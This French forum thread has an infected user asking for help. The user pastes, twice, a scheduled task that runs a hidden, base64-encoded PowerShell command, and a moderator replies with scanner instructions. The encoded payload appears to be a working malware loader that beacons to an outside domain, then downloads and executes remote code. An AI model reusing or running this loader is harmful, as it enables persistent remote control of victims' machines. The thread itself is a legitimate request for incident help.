Cheval de troie
KingkoPop
-
bazfile Messages postés 60845 Statut Modérateur, Contributeur sécurité -
bazfile Messages postés 60845 Statut Modérateur, Contributeur sécurité -
Bonjours, J'ai eu un cheval de troie qui a infecté ma machine et j'ai vue qu'ils m'ont rajouté des tache dans le planificateur nottement celui la que j'ai du mal a comprendre:
Dans l'invite de commande il fait cette commande:
/c powershell -WindowStyle Hidden -E "JAB2ACAAPQAgACIAMAAiADsACgAkAGwAdgAgAD0AIAAiADMAIgA7AAoAJABkACAAPQAgACIAdABvAG8AYgBsAHkAYwBhAHIAcwAuAGMAbwBtACIAOwAKACQAZQBwACAAPQAgACIAVwB5AEkAegBNAEQASQB3AE0AVABZAHoATQB6AGcANABOAEQAZwAzAE0AegBZAHgATgBpAEkAcwBNAFQAWQAwAE4AagBRADUATgBUAGcAMQBPAEYAMAA9ACIAOwAKAAoAJAByAHAAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABMAG8AZwBpAFMAaABkAHIAXAAiADsACgAkAHIAbgAgAD0AIAAiAFMAZQB0AHQAaQBuAGcAcwAiADsACgAKACQAYQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAHQAcgB5ACAAewAKAAkAJABqAHAAPQAkAGEALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAcAApACkAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7AAoAfQAgAGMAYQB0AGMAaAB7AH0ACgAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAGYAdQBuAGMAdABpAG8AbgAgAGQAKABbAHMAdAByAGkAbgBnAF0AJABkAGUAKQAgAHsACgAJACQAZABiAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABlACkAOwAKAAoACQAkAHMAdAA9ACQAYQAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABkAGIAWwAwAC4ALgA0AF0AOwAKAAoACQAkAGkAPQAwADsACgAJACQAbAA9ACQAZQBkAC4ATABlAG4AZwB0AGgAOwAKAAkAJABrAD0AQAAoACkAOwAKAAoACQBbAGEAcgByAGEAeQBdADoAOgBSAGUAcwBpAHoAZQAoAFsAcgBlAGYAXQAkAGsALAAkAHMAdAAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAcwB0ACkAIAB7ACQAawBbACQAaQArACsAXQA9ACQAYgAgAC0AYgB4AG8AcgAgACQAZQBkAFsAJABpACUAJABsAF0AfQAKAAoACQAkAGIAcwA9ACQAZABiAFsANQAuAC4AJABkAGIALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAYQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAHQAcgB5ACAAewAKAAkACQB0AHIAeQAgAHsACgAJAAkACQBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcgBwACkAKQAgAHsACgAJAAkACQAJAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcgBwACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAHIAcAAgAC0ATgBhAG0AZQAgACQAcgBuADsACgAJAAkACQAJACQAagBkACAAPQAgAGQAKAAkAHIAKQA7AAoACgAJAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0AIABlAGwAcwBlACAAewAKAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAGQAdAAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAC8AeAA/AHUAPQAkAHUAJgBpAHMAPQAkAGkAcwAmAGwAdgA9ACQAbAB2ACYAcgB2AD0AJAB2ACIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAKAAkACQAJACQAagBkADIAIAA9ACAAZAAoACQAZAB0ACkAOwAKAAkACQAJAGkAZgAgACgAJABqAGQAMgBbADAAXQAgAC0AZwB0ACAAJAB2ACkAIAB7AAoACQAJAAkACQAkAHYAMgAgAD0AIAAkAGoAZAAyAFsAMABdADsACgAKAAkACQAJAAkATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcgBwACAALQBOAGEAbQBlACAAJAByAG4AIAAtAFYAYQBsAHUAZQAgACQAZAB0ACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIAUwB0AHIAaQBuAGcAIgAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkACQAkAGoAZAAgAD0AIAAkAGoAZAAyADsACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZQB4ACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQBzAHQAbwBwADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5ACAAewAKAAkACQAJAAkAaQBlAHgAIAAkAGoAZABbADEAXQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAHMAbABzACAAPQAgACgAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANwAwACAALQBtAGkAbgBpAG0AdQBtACAANQAwACkAKgA2ADAAKQA7AAoACQAJAAkAJAB0AHMAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAAkAcgB1AG4AKAAkAGQALAAkAHUALAAkAGkAcwApADsACgAJAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAoAGcAZQB0AC0AcgBhAG4AZABvAG0AIAA2ADUAIAAtAG0AaQBuAGkAbQB1AG0AIAAyADUAKQA7AAoACQAJAAkACQAkAHQAcwAyACAAPQAgAFsAaQBuAHQAXQAoAEcAZQB0AC0ARABhAHQAZQAgAC0AVQBGAG8AcgBtAGEAdAAgACUAcwApADsACgAKAAkACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQAJAGIAcgBlAGEAawAgAHMAbAA7AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="
Ayant vue cette monstruosité je me demande comment retrouvé la chose qui est Hidden pour pouvoir comprendre ce qu'il fait avec ce fichier.
Ma question est: Comment on peut retrouvé cette chose ?
Merci d'avance !
Dans l'invite de commande il fait cette commande:
/c powershell -WindowStyle Hidden -E "JAB2ACAAPQAgACIAMAAiADsACgAkAGwAdgAgAD0AIAAiADMAIgA7AAoAJABkACAAPQAgACIAdABvAG8AYgBsAHkAYwBhAHIAcwAuAGMAbwBtACIAOwAKACQAZQBwACAAPQAgACIAVwB5AEkAegBNAEQASQB3AE0AVABZAHoATQB6AGcANABOAEQAZwAzAE0AegBZAHgATgBpAEkAcwBNAFQAWQAwAE4AagBRADUATgBUAGcAMQBPAEYAMAA9ACIAOwAKAAoAJAByAHAAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABMAG8AZwBpAFMAaABkAHIAXAAiADsACgAkAHIAbgAgAD0AIAAiAFMAZQB0AHQAaQBuAGcAcwAiADsACgAKACQAYQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAHQAcgB5ACAAewAKAAkAJABqAHAAPQAkAGEALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAcAApACkAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7AAoAfQAgAGMAYQB0AGMAaAB7AH0ACgAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAGYAdQBuAGMAdABpAG8AbgAgAGQAKABbAHMAdAByAGkAbgBnAF0AJABkAGUAKQAgAHsACgAJACQAZABiAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABlACkAOwAKAAoACQAkAHMAdAA9ACQAYQAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABkAGIAWwAwAC4ALgA0AF0AOwAKAAoACQAkAGkAPQAwADsACgAJACQAbAA9ACQAZQBkAC4ATABlAG4AZwB0AGgAOwAKAAkAJABrAD0AQAAoACkAOwAKAAoACQBbAGEAcgByAGEAeQBdADoAOgBSAGUAcwBpAHoAZQAoAFsAcgBlAGYAXQAkAGsALAAkAHMAdAAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAcwB0ACkAIAB7ACQAawBbACQAaQArACsAXQA9ACQAYgAgAC0AYgB4AG8AcgAgACQAZQBkAFsAJABpACUAJABsAF0AfQAKAAoACQAkAGIAcwA9ACQAZABiAFsANQAuAC4AJABkAGIALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAYQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAHQAcgB5ACAAewAKAAkACQB0AHIAeQAgAHsACgAJAAkACQBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcgBwACkAKQAgAHsACgAJAAkACQAJAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcgBwACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAHIAcAAgAC0ATgBhAG0AZQAgACQAcgBuADsACgAJAAkACQAJACQAagBkACAAPQAgAGQAKAAkAHIAKQA7AAoACgAJAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0AIABlAGwAcwBlACAAewAKAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAGQAdAAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAC8AeAA/AHUAPQAkAHUAJgBpAHMAPQAkAGkAcwAmAGwAdgA9ACQAbAB2ACYAcgB2AD0AJAB2ACIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAKAAkACQAJACQAagBkADIAIAA9ACAAZAAoACQAZAB0ACkAOwAKAAkACQAJAGkAZgAgACgAJABqAGQAMgBbADAAXQAgAC0AZwB0ACAAJAB2ACkAIAB7AAoACQAJAAkACQAkAHYAMgAgAD0AIAAkAGoAZAAyAFsAMABdADsACgAKAAkACQAJAAkATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcgBwACAALQBOAGEAbQBlACAAJAByAG4AIAAtAFYAYQBsAHUAZQAgACQAZAB0ACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIAUwB0AHIAaQBuAGcAIgAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkACQAkAGoAZAAgAD0AIAAkAGoAZAAyADsACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZQB4ACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQBzAHQAbwBwADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5ACAAewAKAAkACQAJAAkAaQBlAHgAIAAkAGoAZABbADEAXQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAHMAbABzACAAPQAgACgAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANwAwACAALQBtAGkAbgBpAG0AdQBtACAANQAwACkAKgA2ADAAKQA7AAoACQAJAAkAJAB0AHMAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAAkAcgB1AG4AKAAkAGQALAAkAHUALAAkAGkAcwApADsACgAJAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAoAGcAZQB0AC0AcgBhAG4AZABvAG0AIAA2ADUAIAAtAG0AaQBuAGkAbQB1AG0AIAAyADUAKQA7AAoACQAJAAkACQAkAHQAcwAyACAAPQAgAFsAaQBuAHQAXQAoAEcAZQB0AC0ARABhAHQAZQAgAC0AVQBGAG8AcgBtAGEAdAAgACUAcwApADsACgAKAAkACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQAJAGIAcgBlAGEAawAgAHMAbAA7AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="
Ayant vue cette monstruosité je me demande comment retrouvé la chose qui est Hidden pour pouvoir comprendre ce qu'il fait avec ce fichier.
Ma question est: Comment on peut retrouvé cette chose ?
Merci d'avance !
A voir également:
- Cheval de troie
- Comment supprimer cheval de troie gratuitement - Télécharger - Antivirus & Antimalwares
- Ordinateur bloqué cheval de troie - Accueil - Arnaque
- Jeux de petit chevaux gratuit à télécharger - Télécharger - Jeux vidéo
- Cheval de troie virus - Accueil - Virus
- Qu'est ce que le cheval au poker - Forum Virus
2 réponses
Bonjour,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
Attention, attendre que les messages disant que l'analyse est terminée s'affichent
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Bonjour,
Merci de ta réponse voici les 2 fichiers txt:
Addition.txt : https://www.cjoint.com/c/LFhohXiTonV
FrST.txt : https://www.cjoint.com/c/LFhoifOXM5V
Merci d'avance <3
Merci de ta réponse voici les 2 fichiers txt:
Addition.txt : https://www.cjoint.com/c/LFhohXiTonV
FrST.txt : https://www.cjoint.com/c/LFhoifOXM5V
Merci d'avance <3